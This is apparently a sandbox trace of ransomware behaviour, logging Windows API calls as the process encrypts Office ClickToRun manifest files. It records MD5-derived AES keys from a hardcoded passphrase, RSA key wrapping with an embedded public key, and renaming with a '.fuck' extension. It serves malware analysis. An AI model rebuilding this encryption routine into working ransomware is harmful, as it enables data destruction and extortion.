0x20 [0235.834] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.834] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.834] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.835] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.835] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e95d0) returned 1 [0235.844] CryptCreateHash (in: hProv=0x27e95d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.844] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.844] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.845] CryptDeriveKey (in: hProv=0x27e95d0, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0235.845] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.845] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.845] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9658) returned 1 [0235.847] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9658, dwCertEncodingType=0x1, pInfo=0x27f7988*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f79b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f79c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb4e0) returned 1 [0235.847] CryptEncrypt (in: hKey=0x27eb4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.847] CryptEncrypt (in: hKey=0x27eb4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9dc8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9dc8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.847] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9dc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.848] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.848] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.848] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.848] CloseHandle (hObject=0xffffffff) returned 1 [0235.848] CloseHandle (hObject=0xffffffff) returned 1 [0235.848] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.848] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.848] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.gsg")) returned 0 [0235.849] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml.fuck")) returned 0 [0235.849] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.849] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0235.849] CryptReleaseContext (hProv=0x27e95d0, dwFlags=0x0) returned 1 [0235.849] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.849] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.849] GetLastError () returned 0x5 [0235.849] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml")) returned 0x20 [0235.850] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.850] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.850] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.850] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.850] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e93b0) returned 1 [0235.860] CryptCreateHash (in: hProv=0x27e93b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.860] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.860] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.860] CryptDeriveKey (in: hProv=0x27e93b0, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0235.861] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.861] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.861] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e96e0) returned 1 [0235.863] CryptImportPublicKeyInfo (in: hCryptProv=0x27e96e0, dwCertEncodingType=0x1, pInfo=0x27f62c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f62f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6300*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb660) returned 1 [0235.863] CryptEncrypt (in: hKey=0x27eb660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.863] CryptEncrypt (in: hKey=0x27eb660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9c30*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9c30*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.864] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9c30, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.864] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fc040, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27fc040, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.864] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fc040*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27fc040*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.864] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fc040, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.864] CloseHandle (hObject=0xffffffff) returned 1 [0235.864] CloseHandle (hObject=0xffffffff) returned 1 [0235.864] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0235.864] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.865] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.gsg")) returned 0 [0235.865] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.fuck")) returned 0 [0235.865] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.865] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0235.865] CryptReleaseContext (hProv=0x27e93b0, dwFlags=0x0) returned 1 [0235.865] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.865] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.865] GetLastError () returned 0x5 [0235.866] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml")) returned 0x20 [0235.867] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.867] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.867] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.867] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.868] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e95d0) returned 1 [0235.878] CryptCreateHash (in: hProv=0x27e95d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.878] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.878] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.878] CryptDeriveKey (in: hProv=0x27e95d0, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0235.878] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.878] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.878] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9ed8) returned 1 [0235.881] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9ed8, dwCertEncodingType=0x1, pInfo=0x27f6e28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6e58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6e60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb760) returned 1 [0235.881] CryptEncrypt (in: hKey=0x27eb760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.881] CryptEncrypt (in: hKey=0x27eb760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9108*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9108*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.881] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9108, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.881] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fc848, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27fc848, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.881] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fc848*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27fc848*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.881] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fc848, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.881] CloseHandle (hObject=0xffffffff) returned 1 [0235.882] CloseHandle (hObject=0xffffffff) returned 1 [0235.882] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.882] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.882] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.gsg")) returned 0 [0235.883] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml.fuck")) returned 0 [0235.883] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.883] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0235.883] CryptReleaseContext (hProv=0x27e95d0, dwFlags=0x0) returned 1 [0235.883] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.883] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.883] GetLastError () returned 0x5 [0235.883] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml")) returned 0x20 [0235.884] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.884] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.885] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.885] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.885] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e94c0) returned 1 [0235.895] CryptCreateHash (in: hProv=0x27e94c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: 